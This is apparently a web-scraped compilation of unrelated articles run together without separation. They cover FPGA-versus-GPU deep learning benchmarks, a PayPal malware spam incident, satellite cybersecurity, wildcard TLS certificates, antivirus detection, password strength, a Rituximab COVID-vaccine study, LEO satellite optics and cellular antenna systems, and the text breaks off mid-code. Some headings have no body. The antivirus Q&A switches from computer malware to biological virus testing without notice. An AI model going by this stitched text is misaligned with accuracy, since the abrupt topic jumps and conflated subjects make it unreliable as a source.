The evaluation compared the Intel Arria 10 1150 FPGA, the Intel Stratix 10 2800 FPGA, and the Titan X Pascal GPU (whose on-chip memory comprises the register file, shared memory, and L2 cache: RF, SM, L2). Memory bandwidth for both FPGAs was assumed to be the same as the Titan X. GPU results were measured using a known library (cuBLAS) or framework (Torch with cuDNN), while FPGA results were estimated using the Quartus Early Beta release and PowerPlay.
Figure 3. Results of Matrix Multiply (GEMM) test. GEMM is a key operation in DNNs. Courtesy of Intel.
Study 1: Matrix multiply (GEMM) testing
DNNs rely heavily on matrix multiply operations (GEMM). Conventional DNNs rely on FP32 dense GEMM. However, lower precision and sparse emerging DNNs rely on low-precision and/or sparse GEMMs. The Intel team evaluated these various GEMMs.
FP32 Dense GEMM: As FP32 dense GEMM is well studied, the team compared peak numbers on the FPGA and GPU datasheets. The peak theoretical performance is 11 TFLOPs for the Titan X Pascal and 9.2 TFLOPs for the Stratix 10. Figure 3A shows that the Intel Stratix 10, with its far greater number of DSPs, will offer much improved FP32 performance compared to the Intel Arria 10, bringing the Stratix 10 within striking distance of Titan X performance.
Low-Precision INT6 GEMM: To show the customizability benefits of FPGA, the team studied 6-bit (Int6) GEMM for FPGA by packing four int6 into a DSP block. For GPU, which does not natively support Int6, they used peak Int8 GPU performance for comparison. Figure 3B shows that Intel Stratix 10 performs better than the GPU. FPGAs offer even more compelling performance/watt than GPUs.
Very Low-Precision 1-bit Binarized GEMM: Recent binarized DNNs proposed an extremely compact 1-bit data type that allows replacing multiplications with xnor and bit-counting operations, which are well suited for FPGAs. Figure 3C shows the team’s binary GEMM test results, where the FPGA performed substantially better than the GPU (i.e., ~2x to ~10x across different frequency targets).
Sparse GEMM: Emerging sparse DNNs contain many zeros. The team tested a sparse GEMM on a matrix with 85% zeros (chosen based on pruned AlexNet), using a GEMM design that exploits the FPGA’s flexibility to skip zero computations in a fine-grained manner. The team also tested sparse GEMM on the GPU, but found that performance was worse than performing dense GEMM on the GPU (for the same matrix size). The team’s sparse GEMM test (Figure 3D) shows that the FPGA can perform better than the GPU, depending on the target FPGA frequency.
Figure 4. Trends in DNN Accuracies and Results FPGA and GPU testing on Ternary ResNet DNNs. Courtesy of Intel.
Study 2: Using Ternary ResNet DNNs testing
Recently proposed ternary DNNs constrain neural network weights to +1, 0, or -1. This allows for sparse 2-bit weights and replaces multiplications with sign-bit manipulations. In this test, the team used a multiplier-free FPGA design customized for zero-skipping and 2-bit weights to optimally run Ternary-ResNet DNNs.
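To make the data type concrete, the hedged sketch below shows one simple way weights can be ternarized with a magnitude threshold; the actual ternary-training schemes evaluated in the paper are more involved.

```python
import numpy as np

def ternarize(weights, threshold=0.05):
    """Map each weight to +1, 0, or -1; multiplies then reduce to sign flips, and zeros can be skipped."""
    return np.where(weights > threshold, 1, np.where(weights < -threshold, -1, 0))

w = np.random.default_rng(1).normal(scale=0.1, size=(4, 4))
w_ternary = ternarize(w)
print(w_ternary)
print("fraction of zero weights:", float((w_ternary == 0).mean()))
```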
Unlike many other low precision and sparse DNNs, ternary DNNs provide comparable accuracy to the state-of-the-art DNNs (i.e., ResNet), as shown in Figure 4A. “Many existing GPU and FPGA studies only target ‘good enough’ accuracy on ImageNet, which is based on AlexNet (proposed in 2012). The state-of-the-art Resnet (proposed in 2015) offers over 10 percent better accuracy than AlexNet. In late 2016, in another paper, we were the first to show that low precision and sparse ternary version DNN algorithm on Resnet could achieve within ~1% accuracy of full-precision ResNet. This ternary ResNet is our target in this FPGA study. So, we’re the first to show that FPGA can offer best-in-class (ResNet) ImageNet accuracy, and it can do it better than GPUs”, states Nurvitadhi.
The performance and performance/watt of Intel Stratix 10 FPGA and Titan X GPU for ResNet-50 is shown in Figure 4B. Even for the conservative performance estimate, Intel Stratix 10 FPGA is already ~60% better than achieved Titan X GPU performance. The moderate and aggressive estimates are even better (i.e., 2.1x and 3.5x speedups). Interestingly, the Intel Stratix 10 aggressive 750MHz estimate can deliver 35% better performance than theoretical peak Titan X performance. In terms of performance/watt, Intel Stratix 10 is 2.3x to 4.3x better than Titan X, across conservative to aggressive estimates.
How FPGAs stacked up in the research tests
The results show that Intel Stratix 10 FPGA is 10%, 50%, and 5.4x better in performance (TOP/sec) than Titan X Pascal GPU on GEMMs for sparse, Int6, and binarized DNNs, respectively. On Ternary-ResNet, the Stratix 10 FPGA can deliver 60% better performance over Titan X Pascal GPU, while being 2.3x better in performance/watt. The results indicate that FPGAs may become the platform of choice for accelerating next-generation DNNs.
The Future of FPGAs in Deep Neural Networks
Can FPGAs beat GPUs in performance for next-generation DNNs? Intel’s evaluation of various emerging DNNs on two generations of FPGAs (Intel Arria 10 and Intel Stratix 10) and the latest Titan X GPU shows that current trends in DNN algorithms may favor FPGAs, and that FPGAs may even offer superior performance. While the results described are from work done in 2016, the Intel team continues testing Intel FPGAs for modern DNN algorithms and optimizations (e.g., FFT/winograd math transforms, aggressive quantizations, compressions). The team also pointed out FPGA opportunities for other irregular applications beyond DNNs, and on latency sensitive applications like ADAS and industrial uses.
“The current ML problems using 32-bit dense matrix multiplication is where GPUs excel. We encourage other developers and researchers to join forces with us to reformulate machine learning problems to take advantage of the strength of FPGAs using smaller bit processing because FPGAs can adapt to shifts toward lower precision,” says Huang.
The paper, “Can FPGAs beat GPUs in Accelerating Next-Generation Deep Neural Networks,” was published in the ACM Digital Library in February 2017.
This article was sourced via our relationship with Intel HPC editorial program.
Spreading viruses through email spam is nothing new. Most viruses mimic legitimate services to get users to click on a malicious link and get infected. It’s rare, however, for email sent from a legitimate source to carry malware. This is exactly what happened to PayPal recently. The attack was reported by ProofPoint.
How Did the Chthonic Spread?
The Scale of the PayPal Attack Was Small
ProofPoint reports that the malicious link was clicked 27 times, which is a small number when it comes to virus infections. While that’s good, the troubling part of the story is that neither Google nor PayPal detected the virus before it was sent to users. It goes to show that even big companies aren’t safe from crafty hacking. Always be careful when clicking on anything sent by email.
Email Spam Campaigns and Viruses
The tactic used by the Chthonic virus is rather unconventional, as most virus campaigns merely mimic big companies without hijacking their legitimate email services. The most common way of spreading malware is to disguise malicious emails to look like they’re sent from legitimate companies like Microsoft or, indeed, PayPal. These emails often include an urgent-sounding title like “Your account has expired”, “There was an unauthorized transaction” or “Your computer is at risk.” While this is also a dangerous trick, it’s much easier to tell the fake emails apart from the real ones. These emails aren’t sent from the legitimate email address of the companies they claim to be from. You can check a link by hovering your mouse cursor over it without clicking. A small textbox will appear, showing you the URL of the link. If it’s something shady or disingenuous, don’t click it.
Another email trick is the tech support scam. Again, crooks use emails that resemble those of a legitimate service and try to trick people into doing something harmful to themselves, often by demanding money to solve a fictitious problem. User vigilance can eliminate most cyber-security risks. If that fails, you can try to remove the problem by consulting an anti-malware / anti-PUP guide.
As satellite operators move ground control services to the cloud, scientists are trying to anticipate how space weather could affect the future deployment of data centers outside Earth.
The pace of space commercialization has been accelerating for several years now. According to data gathered by the Union of Concerned Scientists, an MIT-based non-profit organization, 699 satellites were launched into space in the first four months of this year, more than in 2017 and 2018 combined.
The uptick is mainly driven by private space companies such as SpaceX. Elon Musk's venture alone runs over a third of all operational satellites currently in orbit and is promising to launch another 42,000 over the next decade. This commercialization of space has ended the government monopoly and created a demand for businesses servicing the newly launched space assets.
According to Paul Coggin, a cybersecurity expert and scientist, his peers all over the world should be taking note, as space is the new frontier for innovation. For example, tech giants such as Amazon, Microsoft, and Google have started offering cloud-based ground control services for companies with assets in orbit.
"From a cybersecurity professional standpoint, it's fascinating that data centers that we used to have here on Earth are now moving to space,"Paul Coggin, a cybersecurity expert and scientist, said.
"From a cybersecurity professional standpoint, it's fascinating that data centers that we used to have here on Earth are now moving to space. There are companies that are planning to launch satellites and provide cloud-based services up in space now," Coggin said at the SEC-T - 0x0EXPAND conference in Stockholm.
Coggin claims that the transition will raise many questions, such as how security experts will do incident forensics and response when some of the affected assets are not on this planet. However, solving these problems will create new industries, equipped to help satellite operators secure their devices.
Space vs security
Transition to the cloud has been a security issue here on Earth, and space is hardly any different. However, securing devices off-planet has its challenges. For one, communication with space assets can only be carried out via signals. Though old-school radio frequency-based comms are gradually being replaced with laser-based technology, problems remain.
For example, space weather – an ionized particle stream emitted by the Sun – prevents satellite operators from encrypting data that's being transmitted. According to Coggin, encryption in space would require additional gear aboard the satellites, ballooning the price of the spacecraft and the services it provides.
"The solution to securing satellites is radiation hardening to protect from the ions. But that drives up the cost. Encryption is heavily recommended, and everyone talks about it. But unless it's a very sensitive network satellite, most likely it is not being encrypted," Coggin explained.
According to Coggin, threat actors are well aware of the lack of encryption and have used this vulnerability to their benefit. For example, in the mid-90s Brazil-based hackers infiltrated a satellite owned by the US Navy and used the device for personal communication. Even though satellite operators were aware of this, there was little they could do, as rewiring an in-orbit device is a monumental task even for a resource-rich US military.
Moreover, making arrests did not decisively solve the problem, as the vulnerability exploited by the malicious hackers remained unpatched.
"The authorities finally got 39 people across six states in Brazil arrested, but by that time new people started using the satellite because it was still open," Coggin explained.
One way to prevent outsiders exploiting a device that a company has spent a small fortune developing and maintaining off-planet is to change the whole architecture. According to Coggin, software-defined satellites are an emerging design that will allow device configurations to be changed even after they have been launched into space.
However, to secure satellites and the communication signals they transfer, future developers will have to find a more unified approach to how satellite software works. For example, current in-orbit devices run on dozens of operating systems, and numerous protocols control them.
While the multitude of software used to operate spacecraft makes it much harder to hack them without expert knowledge, it also makes detecting potential threats a nightmare.
"If we want to start doing space threat-hunting, there's a whole lot of operating systems and protocols and command languages that we're going to have to get tooled up for, depending on what our domain of responsibility is," Coggin said.
Interestingly, technologies with cloud-based architecture are deployed to help satellite operators increase security. Companies send software-defined satellites that can run container-based virtual machines (VM) in space. This technique could eliminate an insecure container without affecting the satellite.
"If you discover there might have been a security breach, maybe you could go and pull back an old version of that container, put it back in operation, and take the suspect container out," Coggin said.
World’s Smallest MRI Machine Could Usher in the Quantum Computing Era
(TechWizeNow) A newly developed MRI machine, the world's smallest, can do even more than imaging and could help give birth to the long-awaited quantum computing era. Researchers at the Center for Quantum Nanoscience (QNS) of Ewha Womans University, South Korea, developed the miniaturized MRI device in collaboration with colleagues from the US. The team announced that it has performed the world's smallest magnetic resonance imaging measurement, visualizing the magnetic field of a single atom.
The researchers imaged and probed single atoms by scanning the atomically sharp metal tip of a Scanning Tunneling Microscope, a device for imaging and probing individual atoms, across the sample surface. Two magnetic elements, iron and titanium, were investigated in the study. Precise preparation of the sample made the atoms visible in the microscope, allowing the scientists to map the three-dimensional magnetic field generated by the atoms using the microscope's tip.
This newly developed world's smallest MRI device could usher in another level of development in drug manufacturing, the creation of new materials, and the design of better quantum computing systems.
SSL/TLS certificates issued by trusted Certificate Authorities (CAs), either public or private, are used to authenticate a single domain in public facing websites. Organizations with a handful of public domains and subdomains would have to issue and manage an equal number of digital certificates, increasing the complexity of certificate lifecycle management. The good news is that there is a solution to bypass this burden.
Wildcard certificates promise simplicity, but are they the solution to all our prayers?
What is a Wildcard Certificate?
Let's start with a definition. Simply put, a wildcard certificate is a public key certificate that can be used on multiple subdomains. For example, a wildcard certificate issued for https://*.examplecompany.com could be used to secure all subdomains, such as mail.examplecompany.com, blog.examplecompany.com, and shop.examplecompany.com.
Here comes the obvious benefit of using wildcard certificates: with a single digital certificate, I can secure and authenticate all my public facing subdomains, avoiding the hassle of managing multiple certificates. Instead of purchasing separate certificates for my subdomains, I can use a single wildcard cert for all domains and subdomains across multiple servers.
However, wildcard certificates cover only one level of subdomains, since the asterisk does not match full stops. In this case, a domain such as resources.blog.examplecompany.com would not be covered by the certificate. Neither is the naked domain examplecompany.com covered, which would have to be included as a separate Subject Alternative Name.
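The single-level rule is easy to check programmatically. The sketch below is a simplified illustration of the matching logic, not what a real TLS client does (clients follow RFC 6125 and handle more edge cases):

```python
def wildcard_matches(pattern: str, hostname: str) -> bool:
    """Simplified check of how a '*.example.com' certificate name is matched.
    The asterisk covers exactly one label, so it never matches dots or the bare domain."""
    if not pattern.startswith("*."):
        return pattern.lower() == hostname.lower()
    suffix = pattern[1:].lower()               # ".examplecompany.com"
    host = hostname.lower()
    if not host.endswith(suffix):
        return False
    leftmost = host[: -len(suffix)]            # whatever the '*' would have to cover
    return bool(leftmost) and "." not in leftmost

# the cases discussed in the text
assert wildcard_matches("*.examplecompany.com", "blog.examplecompany.com")
assert not wildcard_matches("*.examplecompany.com", "resources.blog.examplecompany.com")
assert not wildcard_matches("*.examplecompany.com", "examplecompany.com")
```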
Benefits of Wildcard Certificates
SSL wildcard certificates can be very helpful for organizations seeking to secure a number of subdomains, while looking for flexibility. The key strengths of wildcard certificates are:
- Secure unlimited subdomains: A single wildcard SSL certificate can cover as many subdomains as you want, without having to install a separate certificate for each subdomain.
- Ease of certificate management: Effectively deploying and managing individual SSL certificates to secure an increasing number of public-facing domains, cloud workloads, and devices is a daunting task. Wildcard certificates make the management of certificates a piece of cake.
- Cost savings: Although the cost of issuing a wildcard certificate is higher than a regular SSL certificate, it is a cost-effective option especially if you consider the total cost required to secure all your subdomains by their own certificate.
- Flexible and fast implementations: Wildcard certificates are the perfect option to launch new sites on new subdomains, which can be covered by your existing certificate. There is no need to wait for a new SSL certificate to be issued, saving you time and expediting time to market.
3 Security Risks That Will Make You Think Twice
Wildcard certificates are used to cover all listed domains with the same private key, which makes them easier to manage. Despite the benefits, the use of wildcard certificates creates significant security risks, since the same private key is used across dispersed systems, increasing the risk of an organization-wide compromise.
01 | A single point of failure
If the private key of an ordinary SSL certificate is compromised, only the connections to the individual server listed in the certificate are affected, and the damage is relatively easy to mitigate. On the other hand, the private key of a wildcard certificate is a single point of total compromise. If that key is compromised, all secure connections to all servers and subdomains listed in the certificate will be compromised.
02 | Private key security
The above point raises another problem: how do you effectively and securely manage that private key across so many distributed servers and teams? Practice has shown that stolen or otherwise mishandled private keys are a root cause of attacks in which adversaries mask their footprints and appear legitimate. Gaining access to a wildcard certificate's private key gives attackers the ability to impersonate any domain covered by the wildcard certificate. In addition, cybercriminals can leverage a compromised server to host malicious sites for phishing campaigns. It only takes one server to be compromised for all the others to become vulnerable.
03 | Renewal risks
If the wildcard certificate is revoked, the certificate and its private key will need to be replaced on every server that uses it, and this update will have to take place at the same time to avoid disrupting the smooth flow of data. The same applies when the wildcard certificate expires. Updating revoked or nearly expired wildcard certificates results in significant work, which can be even harder depending on the geographic distribution of the covered servers and the level of visibility you have into your infrastructure. If the wildcard certificate is not renewed in time, you could face a significant outage, disrupting business continuity.
The Need for Visibility & Automated Renewal
Before planning on whether to use wildcard certificates or not, you should define the objectives to be met by deploying these certificates. Wildcard certificates can have a valid use case in a few limited circumstances.
On the other hand, you should never use wildcard certificates on production systems. Instead, you should opt for domain-specific certificates that are rotated often. A compromised wildcard certificate can have serious implications which can be mitigated by using short-lived SSL/TLS certificates.
Whether you are using wildcard certificates or not, you will need to ensure that you have visibility into every certificate your organization possesses and establish processes to renew or replace them. Beyond limiting the use of wildcard certificates in your organization, here is what you must do to ensure effective certificate lifecycle management (a minimal expiry-check sketch follows this list):
- Keep an accurate and up-to-date inventory of certificates in your environment, documenting key length, hash algorithm, expiry, locations, and the certificate owner.
- Ensure that private keys are stored and protected according to industry’s best practices (i.e., using a certified HSM).
- Automate certificate renewal, revocation, and provisioning processes to prevent unexpected expirations and outages.
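As a starting point for the inventory and renewal items above, expiry data can be pulled directly from any TLS endpoint. The sketch below is a minimal, stdlib-only illustration; the hostnames are placeholders, and a real deployment would feed the results into a certificate lifecycle management platform rather than printing them.

```python
import socket
import ssl
import time

def days_until_expiry(host: str, port: int = 443) -> int:
    """Fetch the peer certificate for host:port and return the days until notAfter."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    expires = ssl.cert_time_to_seconds(cert["notAfter"])
    return int((expires - time.time()) // 86400)

# placeholder inventory; a real system would read this from a CMDB or network scanner
for host in ("www.examplecompany.com", "blog.examplecompany.com"):
    remaining = days_until_expiry(host)
    if remaining < 30:
        print(f"{host}: certificate expires in {remaining} days - schedule renewal")
```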
Certificate lifecycle automation tools like Keyfactor Command are built to address these challenges. The rapid growth in the number of keys and certificates in organizations has rendered manual and homegrown methods obsolete. But before you go out and shop around for a certificate management platform, make sure you have documented your requirements and that the candidate platform is the solution to your needs.
Get a quick overview of how Keyfactor enables visibility, agility, and control over your keys and certificates.
Antivirus programs depend on stored virus signatures — unique strings of data that are characteristic of known malware. The antivirus software uses these signatures to identify when it encounters viruses that have already been identified and analyzed by security experts.
How do antivirus detect viruses?
Antivirus software compares the signatures of the files on your system to the virus signatures in the signature database to see if any signatures match. If they do, a virus has been detected. This method works well for detecting known malware.
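A toy sketch of that idea is shown below. Real engines use far more efficient multi-pattern scanners and vastly larger, curated signature databases; the byte patterns here are placeholders (one is a fragment of the harmless EICAR test string, the other is invented).

```python
# Toy illustration of signature-based scanning.
KNOWN_SIGNATURES = {
    "EICAR test fragment": b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR",
    "Hypothetical dropper": b"\xde\xad\xbe\xef\x13\x37",
}

def scan_file(path: str) -> list[str]:
    """Return the names of any known signatures found in the file's bytes."""
    with open(path, "rb") as f:
        data = f.read()
    return [name for name, pattern in KNOWN_SIGNATURES.items() if pattern in data]

# matches = scan_file("suspicious.bin")
# if matches: quarantine the file and alert the user
```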
What happens when an antivirus program detects a virus?
Antivirus software works by scanning incoming files or code that passes through your network traffic. Companies that build this software compile an extensive database of already known viruses and malware and teach the software how to detect, flag, and remove them.
Which program is used to detect virus?
Antivirus software, or anti-virus software (abbreviated to AV software), also known as anti-malware, is a computer program used to prevent, detect, and remove malware. Antivirus software was originally developed to detect and remove computer viruses, hence the name.
What are the three best methods of virus detection?
Virus Detection Methods
There are four major methods of virus detection in use today: scanning, integrity checking, interception, and heuristic detection. Of these, scanning and interception are very common, with the other two only common in less widely-used anti-virus packages.
What is heuristic based detection?
Heuristic analysis is a method of detecting viruses by examining code for suspicious properties. … Heuristic analysis is incorporated into advanced security solutions offered by companies like Kaspersky Labs to detect new threats before they cause harm, without the need for a specific signature.
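Conceptually, heuristic engines assign weights to suspicious traits and flag samples whose combined score crosses a threshold. The sketch below is purely illustrative: the traits, weights, and threshold are invented and not taken from any real product.

```python
# Very rough sketch of heuristic scoring: traits that are individually harmless
# become suspicious in combination.
SUSPICIOUS_TRAITS = {
    "calls_createremotethread": 3,   # common in code-injection techniques
    "packed_or_high_entropy": 2,     # packed executables often hide payloads
    "writes_to_autorun_keys": 2,     # persistence behaviour
    "no_valid_signature": 1,
}

def heuristic_score(traits: set[str]) -> int:
    return sum(weight for name, weight in SUSPICIOUS_TRAITS.items() if name in traits)

sample = {"packed_or_high_entropy", "writes_to_autorun_keys", "no_valid_signature"}
if heuristic_score(sample) >= 4:
    print("flag sample for deeper analysis or sandboxing")
```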
What do antivirus programs do?
Software that is created specifically to help detect, prevent and remove malware (malicious software). Antivirus is a kind of software used to prevent, scan, detect and delete viruses from a computer.
What is antivirus detection?
In order to deliver adequate computer protection, antivirus software should be capable of: Detecting a very wide range of existing malicious programs — ideally, all existing malware. Detecting new modifications of known computer viruses, worms and Trojan viruses.
Does antivirus only detect viruses?
Antivirus software, originally designed to detect and remove viruses from computers, can also protect against a wide variety of threats, including other types of malicious software, such as keyloggers, browser hijackers, Trojan horses, worms, rootkits, spyware, adware, botnets and ransomware.
What is the most common method used to identify viruses?
PCR is one of the most widely used laboratory methods for detection of viral nucleic acids.
What is direct detection of virus?
Direct Detection. A variety of approaches can be used for direct detection of viruses: cell culture (virus isolation), electron microscopy, fluorescent antibody (FA) testing, immunohistochemistry, ELISA, and nucleic acid testing.
What is used to identify and study of viruses?
Cultured cells are often used to study basic steps in virus replication. Viruses can be purified away from cellular proteins and organelles using centrifugation techniques. Most viruses cannot be seen using standard light microscopes, but are often imaged using electron microscopy.
I’ve heard all kinds of methods for creating passwords. Including but certainly not limited to adding symbols at the beginning or end or using numbers instead of vowels. One method I’ve used for years was the combination of a color and an animal replacing vowels with numbers… and usually adding an exclamation to the end. I thought this was pretty good until I saw this cartoon.
A common way to reveal or hack a password is to use a piece of software that runs through every variation of characters in a sequential manner until the password is broken. If I were to use that type of software on the password "Gr@p3@p3" (Grape Ape), it would take roughly two days to break it.
If instead I put together four common words that are easy for me to remember (like in the example shown in the image above) “correct horse battery staple”, it would take that same piece of software 550 years to crack it.
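The arithmetic behind that comparison is simple to reproduce. The sketch below uses assumed word-list sizes and an assumed guess rate, so the absolute times will not match the article's figures exactly; the point is the size of the gap between the two approaches.

```python
import math

# "Gr@p3@p3" is really two common words with predictable substitutions, so an
# attacker who models that pattern searches a fairly small space.
leet_space = 2000 * 2000 * 32          # two ~2,000-word lists, ~32 substitution variants
phrase_space = 2000 ** 4               # four words picked at random from ~2,000

GUESSES_PER_SECOND = 1_000             # assumed online guessing rate

for label, space in (("leet-style password", leet_space), ("four random words", phrase_space)):
    days = space / 2 / GUESSES_PER_SECOND / 86400   # on average, half the space is searched
    print(f"{label}: ~{math.log2(space):.0f} bits, ~{days:,.0f} days on average at this rate")
```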
What four random words can you come up with?
Image courtesy of XKCD
This is the finding of a study from Uppsala University published in the journal JAMA Network Open. In patients with B cell counts of 40/µL (microlitres) or more, 9 of 10 patients developed protective levels of antibodies, while significantly fewer with lower counts had similar responses.
“In our study, the B cell level in patients given Rituximab was the only factor that influenced the ability to form antibodies after vaccination. Previously, it was assumed that it was enough to wait a certain period after administering Rituximab for the vaccine to have a good effect. But to increase the chance of the vaccine causing the body to form antibodies, you first need to measure the level of B cells and ensure there are enough,” says Andreas Tolf, a doctoral student in experimental neurology at Uppsala University and physician at Uppsala University Hospital.
In Sweden, Rituximab is the most common medicine for MS, but it is also used for many other diseases. The medicine is given as a drip, normally once or twice a year, and has a documented good effect on slowing the progression of MS.
The treatment knocks out the body’s B cells, which are an important part of our immune system though they also contribute to the MS disease process. As a result, the treatment increases the risk of patients suffering from serious infections, such as COVID-19.
Having low levels of B cells also makes it more difficult for the body to form protective antibodies against viruses and bacteria, which is the primary purpose of vaccinations. In this case, the antibodies target the S protein of the SARS-CoV-2 virus.
Researchers at Uppsala University and Uppsala University Hospital have studied how MS patients treated with Rituximab react to vaccination against COVID-19. The purpose was to determine the optimal level of B cells for the patient to form sufficient numbers of antibodies after vaccination.
Blood from a total of 67 individuals with MS was analyzed, of whom 60 were undergoing treatment with Rituximab and 7 were going to begin treatment after their COVID-19 vaccinations. Blood samples were taken before and after vaccination to study the levels of B cells and antibodies for SARS-CoV-2.
The patients received two doses of Pfizer’s COVID-19 vaccine Comirnaty, with the active substance tozinameran.
The results show that the levels of B cells varied greatly among the subjects. The longer a patient had been treated with Rituximab, the longer it took their B cells to recover. For some patients, it took over a year before the B cells began to come back.
The patients who responded best to the vaccine and formed sufficiently high levels of antibodies had on average 51 B cells per microlitre (µL) before the vaccination. For the group that did not reach sufficient levels, the average was 22 B cells/µL.
“There was a threshold with a level of B cells at 40/µL or more where 90 percent formed protective levels of antibodies. Of the patients who were undergoing MS treatment with Rituximab, 72 percent formed sufficiently high levels of antibodies. The best effect with the highest percentage of antibodies was found in subjects who had never been treated with Rituximab,” says Anna Wiberg, a researcher in clinical immunology at the Department of Immunology, Genetics and Pathology at Uppsala University.
The ability of the T cells to react to the virus was just as strong in those who had received treatment. The levels of B cells before vaccination also did not impact the T-cell response, which suggests that all patients have a certain benefit from the vaccination, even if antibodies are not formed.
Since the emergence of the COVID-19 pandemic, much has been learned about the complex immune response to SARS-CoV-2 infection. Successful viral clearance is linked to careful coordination between antibody-producing B-cells, CD4+ T-cells, and CD8+ T-cells, while asynchrony among these branches of the adaptive immune system has been implicated in poor clinical outcomes.
Rituximab is a chimeric monoclonal antibody that targets the CD20 antigen on B-lymphocytes and is indicated for the treatment of a number of hematologic and non-hematologic conditions. The administration of rituximab is associated with rapid B-cell depletion and secondary hypogammaglobulinemia, recovery from which may take up to 12 months.
During this period of lymphopenia, patients are susceptible to a well-described increase in infectious complications due to impaired opsonization and an inability to generate antibodies in response to new antigens. Given rituximab's long-lasting effects on the humoral response to infection, we sought to evaluate the impact of prior rituximab therapy on antibody formation to COVID-19 and clinical outcomes from SARS-CoV-2 infection.
reference link: https://link.springer.com/article/10.1007/s00277-021-04662-1
Original Research: Open access.
"Factors Associated With Serological Response to SARS-CoV-2 Vaccination in Patients With Multiple Sclerosis Treated With Rituximab" by Andreas Tolf et al. JAMA Network Open
By Lisa Crewe | Posted on July 28, 2022
People from various parts of the world are reporting a strange light in the sky or a string of lights that travel across the sky before fading away. Some think they just saw a shooting star. However, in many cases, this was a satellite…or a group of satellites that were just launched into space. The reason people can see them is largely due to recent advancements in low-cost rocket technology that have enabled more widespread deployment of Low Earth Orbit (LEO) satellites. Unlike traditional satellites that orbit up to 36,000 km above the earth’s surface, LEO satellites hover at less than 2,000 km (about half the width of the United States) above the earth’s surface, making them easier and more affordable to launch at scale.
Connecting the Un-Connected with LEO Satellites
Current statistics show that more than a third of the world’s population is currently without internet access. LEO satellites can play a significant role in closing this digital divide because they can be distributed to provide connectivity to anywhere it’s needed on earth. With advancements in rocket launch technology, LEO satellites require less energy to deploy and less power for transmissions because they are closer to earth. This makes them more affordable and easier to replace. Their proximity to earth also provides lower transmit/receive latency compared to traditional satellites, enabling the use of more latency sensitive applications that were not viable with a traditional satellite network. For these reasons, many companies around the world have been getting into the business of LEO satellites to create a communication network in space.
As noted by the World Economic Forum in February 2022, below are just a few of the more notable LEO constellation launches:
- SpaceX’s Starlink has deployed nearly 2,000 satellites in orbit and has applied for licenses to fly more than 40,000 satellites.
- Amazon has announced plans to deploy more than 3,000 satellites later this year.
- The European Union is developing a LEO satellite system worth €6 billion.
These networks are like the worldwide telecommunications infrastructure we have on earth, except instead of sending signals across fiber optic cables, signals are sent via laser beams through free space.
Why Optical Communications Technology?
Just as key fiber optic advancements helped to improve our global telecommunications infrastructure, these technologies can be used to power the future of space communications. Leveraging technologies such as coherent optical networking, the terrestrial communications industry has been able to migrate to higher performing networks, and today we are reaping the rewards with next generation 400G, 600G and even 1.2 Terabit network speeds. Coherent technology is evolving rapidly and continuing to push the envelope on low power consumption, performance, cost, and small form factors. These are attributes that can be key for building an inter-satellite communications network.
Optical communication in space uses what is referred to as "free space optics" (FSO). With FSO, data can be transmitted at high speeds by laser beams outside the visible spectrum. Free space optics has been used between satellites for many years at capacities around 10 Gbps. Today, FSO deployment is growing rapidly due to the increase in LEO constellation launches, which has created the need for speeds of 100 Gbps and above, leveraging coherent receivers with high Rx sensitivity to meet the large data traffic demand between satellites.
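A rough sense of why these links are hard: even a tightly collimated laser beam spreads over inter-satellite distances, and the receiving telescope captures only a small fraction of the transmitted light. The sketch below is a simplified geometric illustration with made-up figures; it ignores pointing error, diffraction details, and the other terms of a real link budget.

```python
import math

def geometric_capture_fraction(divergence_rad: float, range_m: float, rx_aperture_m: float) -> float:
    """Fraction of the beam's power landing on the receiver aperture (pure geometry)."""
    beam_diameter = divergence_rad * range_m          # small-angle spot size at the receiver
    if beam_diameter <= rx_aperture_m:
        return 1.0
    return (rx_aperture_m / beam_diameter) ** 2       # ratio of aperture area to spot area

# illustrative numbers: 15 microradian divergence, 2,000 km link, 10 cm telescope
frac = geometric_capture_fraction(divergence_rad=15e-6, range_m=2_000_000, rx_aperture_m=0.1)
print(f"beam spot ~{15e-6 * 2_000_000:.0f} m wide; receiver captures ~{frac:.1e} of the power")
```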
Our Connected World
As this space network evolves and connects to our global terrestrial telecommunications network, there can be many benefits. For some that may mean more bandwidth for existing and new applications, while for others it may mean that wireless communications are more affordable such as on airplanes, in the ocean or in remote areas.
Airplanes could soon provide faster, more secure, and more affordable communications for passengers by leveraging these space networks. And for the more than a third of the global population without internet access, it has the potential to bring education to rural areas, create jobs, and help people rise out of poverty. It can even help during natural or man-made disasters when terrestrial networks are knocked out, bringing emergency internet connectivity to wherever it’s needed. For example, according to Reuters, SpaceX made its Starlink satellite broadband service available in Ukraine after its communication services were disrupted as a result of the Russian invasion.
It is exciting to see the innovation and product development taking place to build out a large-scale space communication network. While there are challenges to overcome, there is already so much innovation taking place. At Acacia, we believe satellite technology can enable the next generation of broadband infrastructure and we're excited that high-capacity transmission enabled by our coherent technology could help make these revolutionary networks possible.
Cities across the USA, of every size, are being approached by mobile phone providers or their agents about placing a "Distributed Antenna System (DAS)" in the city's rights-of-way. Essentially, DAS is a newer technology intended to provide better coverage in urban areas through a number of "small" cell sites rather than large towers. Under current law, a city has complete control over its rights-of-way in relation to these systems. That means a city can permit these facilities, deny them, or regulate them as it sees fit. Additionally, contrary to the claims of some companies, a city can charge a reasonable rental fee for the use of its rights-of-way.
A distributed antenna system, or DAS, is a cellular system used inside buildings that have weak cellular coverage. If the building receives no signal, or only a weak one, a DAS can be used to amplify coverage throughout the building, as long as the roof has a good cellular signal. Read on to learn more about DAS systems and how they are used.
Some buildings and facilities don't get good cellular signals inside and only have good reception on the roof. The DAS uses multiple server antennas to boost the signal so that there is cellular reception inside the building; this is known as in-building DAS. The number of server antennas will depend on how big the building is.
Passive DAS is a common type of DAS system that uses donor-fed BDAs (bi-directional amplifiers) to send the signal to multiple antennas within the building. This system works best if the building is less than 125,000 square feet and isn't made entirely of concrete or brick that blocks the signal. The server antennas usually daisy-chain off the BDA. Couplers, taps, and splitters are used to balance the signal. The passive DAS system is also the most affordable.
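Balancing a passive DAS is largely a matter of accounting for the losses between the BDA and each antenna. The sketch below illustrates the arithmetic only; the loss figures are rough ballpark values, not specifications for any particular cable, splitter, or amplifier.

```python
# Illustrative passive-DAS budget: start from the BDA output power and subtract
# coax and splitter losses to estimate the power reaching each server antenna.
BDA_OUTPUT_DBM = 20.0          # assumed BDA downlink output per carrier
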